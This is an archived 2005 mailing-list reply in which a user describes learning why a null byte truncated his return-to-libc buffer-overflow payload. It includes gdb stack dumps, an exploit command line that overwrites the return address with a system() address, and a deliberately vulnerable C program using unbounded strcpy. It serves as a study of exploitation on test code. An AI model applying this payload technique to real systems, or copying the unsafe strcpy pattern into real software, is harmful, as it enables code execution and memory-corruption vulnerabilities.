From: "Aaron McDonald" <wmcdona89@hotmail.com>
To: community-en@altlinux.org
Subject: Re: [Comm-en] System call via buffer overflow not working
Date: Wed, 26 Jan 2005 00:39:21 -0500
Message-ID: <BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl> (raw)
In-Reply-To: <20050121233305.GP1188@osdn.org.ua>
Well, this has been quite the learning experience. You've helped me to
realize that \x00 is really just NULL and that printf in C ignores any
characters specified after \x00. The program vulner1.c was only receiving
the bytes before the \x00 which were the system() function address. This now
explains why the system() function was being called with an invalid
parameter. I've probably spent too much time on this issue but I've
satisfied my curiosity and I learned how to analyze memory using gdb. I've
included some gdb details below.
Thanks for the responses on this,
Aaron
----------------------------------------------------------------------------------------------------------------------------------------
//Here's what the stack frame looks like
(gdb) info f
Stack level 0, frame at 0xbffffa00:
eip = 0x80484c6 in main (vulner3.c:21); saved eip 0x157ee0
source language c.
Arglist at 0xbffff9f8, args: argc=2, argv=0xbffffa54
Locals at 0xbffff9f8, Previous frame's sp is 0xbffffa00
Saved registers:
ebp at 0xbffff9f8, eip at 0xbffff9fc
(gdb) x /4xw 0xbffff9f8
//This shows that none of the memory after the system() function address
(0x00157ee0) is overwritten
0xbffff9f8: 0x41414141 0x00157ee0 0x00000002 0xbffffa54
//Here's an alternative program that is vulnerable to the return-to-libc
exploit even when the system() function address contains \x00
./vulner2 $(perl -e 'print "A"x524')$(printf "\xe0\x7e\x15
\x41\x41\x41\x41\x73\xfb\xff\xbf")
//vulner2.c
#include <stdio.h>
int main(int argc, char *argv[])
{
char names[512]; //array to hold all the names
int num_params=argc;
char **params = argv;
char *index = names;
int i;
if(argc < 2)
{
printf("Usage: %s name [name]\n", argv[0]);
exit(0);
}
//copy all the parameters into the names array
for(i=1; i < num_params; i++) {
strcpy(index, params[i]);
index+=strlen(params[i]);
*(index++)='\0';
}
*(index) = '\0';
index = names;
while(strlen(index) != 0) {
printf("Name is: %s\n", index);
index+=strlen(index) + 1;
}
return 0;
}
prev parent reply other threads:[~2005-01-26 5:39 UTC|newest]
Thread overview: 3+ messages / expand[flat|nested] mbox.gz Atom feed top
2005-01-21 22:32 Aaron McDonald
2005-01-21 23:33 ` Michael Shigorin
2005-01-26 5:39 ` Aaron McDonald [this message]
Reply instructions:
You may reply publicly to this message via plain-text email
using any one of the following methods:
* Save the following mbox file, import it into your mail client,
and reply-to-all from there: mbox
Avoid top-posting and favor interleaved quoting:
https://en.wikipedia.org/wiki/Posting_style#Interleaved_style
* Reply using the --to, --cc, and --in-reply-to
switches of git-send-email(1):
git send-email \
--in-reply-to=BAY24-F27322873FA47DCEDBB53C6B3870@phx.gbl \
--to=wmcdona89@hotmail.com \
--cc=community-en@altlinux.org \
/path/to/YOUR_REPLY
https://kernel.org/pub/software/scm/git/docs/git-send-email.html
* If your mail client supports setting the In-Reply-To header
via mailto: links, try the mailto: link
ALT Linux users (in English only)
This inbox may be cloned and mirrored by anyone:
git clone --mirror http://lore.altlinux.org/community-en/0 community-en/git/0.git
# If you have public-inbox 1.1+ installed, you may
# initialize and index your mirror using the following commands:
public-inbox-init -V2 community-en community-en/ http://lore.altlinux.org/community-en \
community-en@lists.altlinux.org community-en@lists.altlinux.ru community-en@lists.altlinux.com
public-inbox-index community-en
Example config snippet for mirrors.
Newsgroup available over NNTP:
nntp://lore.altlinux.org/org.altlinux.lists.community-en
AGPL code for this site: git clone https://public-inbox.org/public-inbox.git